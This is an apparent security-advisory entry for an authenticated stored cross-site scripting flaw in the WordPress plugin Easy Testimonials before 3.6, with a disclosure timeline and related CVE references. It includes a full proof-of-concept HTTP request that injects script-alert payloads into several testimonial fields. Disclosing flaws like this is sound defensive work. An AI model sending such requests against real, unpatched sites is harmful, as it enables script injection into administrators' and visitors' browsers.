Lucene search
Ngo Van ThienWPEX-ID:72252A15-98DE-44DC-A62B-9F2571D076ADHistoryMay 13, 2020 - 12:00 a.m.
Easy Testimonials < 3.6 - Authenticated Stored Cross-Site Scripting (XSS)
2020-05-1300:00:00
Ngo Van Thien
17
EPSS
0.001
Percentile
31.2%
Multiple cross-site scripting vulnerabilities in Easy Testimonials 3.5.2 and lower allow remote attackers to inject arbitrary web script or HTML via the Client Name, Position / Web Address / Other, Location Reviewed / Product Reviewed / Item Reviewed, Rating parameter. Successful exploitation of this vulnerability would allow an authenticated medium-privileged user (contributor+) to inject arbitrary javascript code which is executed when admin and other users access the All Testimonials page in the backend. Furthermore, if the ‘Allow HTML Tags in Testimonials’ option is enabled (which is the default), the XSS will also be triggered when the testimonial is displayed in the frontend. Timeline (WPScanTeam) May 9th, 2020 - Confirmed & Escalated to WP Plugins Team May 11th, 2020 - WP Plugins Team Investigating May 12th, 2020 - v3.6 released, fixing the issue
POST /wp-admin/post.php?post=176&action=edit&meta-box-loader=1&meta-box-loader-nonce=ee114d2173&_locale=user HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/post.php?post=176&action=edit
X-WP-Nonce: c12330b50c
Content-Type: multipart/form-data; boundary=---------------------------1097171016543246544154165286
Origin: http://example.com
Content-Length: 2729
DNT: 1
Connection: close
Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7Ce020133190b2d0d55659fc79576f7341774c77f301b6096023e70f294549d103; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7C8642c6873c0009beb211174d3e93ed720f7d9826d71438fc48ac16ea7e999a66; wp-settings-3=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt; wp-settings-time-3=1588910767
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wpnonce"
c627da8fa4
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/wp-admin/post.php?post=176&action=edit
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="user_ID"
3
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="action"
editpost
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="originalaction"
editpost
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="post_type"
testimonial
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="original_post_status"
publish
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="referredby"
http://example.com/testimonial/alerttitle/
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wp_original_http_referer"
http://example.com/testimonial/alerttitle/
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="post_ID"
176
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="meta-box-order-nonce"
e78bbacfea
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="closedpostboxesnonce"
cb99c6138d
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="samplepermalinknonce"
97e0ac6960
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="my-custom-fields_wpnonce"
f842632466
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_client"
<script>alert('Client name')</script>
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_email"
[email protected]
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_position"
<script>alert('Position / Web Address / Other')</script>
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_other"
<script>alert('Location Reviewed / Product Reviewed / Item Reviewed')</script>
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_rating"
-----------------------------1097171016543246544154165286--
#XSS TRIGGER POINT:
When an admin or authenticate user load contents of all testimonials.
Related
nvd
nvd
CVE-2020-14959
2020-06-22 00:15:10
cve
cve
CVE-2020-14959
2020-06-22 00:15:10
prion
prion
Design/Logic Flaw
2020-06-22 00:15:00
wpvulndb
wpvulndb
Easy Testimonials < 3.6 - Authenticated Stored Cross-Site Scripting (XSS)
2020-05-13 00:00:00
openvas
openvas
WordPress Easy Testimonials Plugin < 3.6 XSS Vulnerability
2021-04-13 00:00:00
cvelist
cvelist
CVE-2020-14959
2020-06-21 23:04:49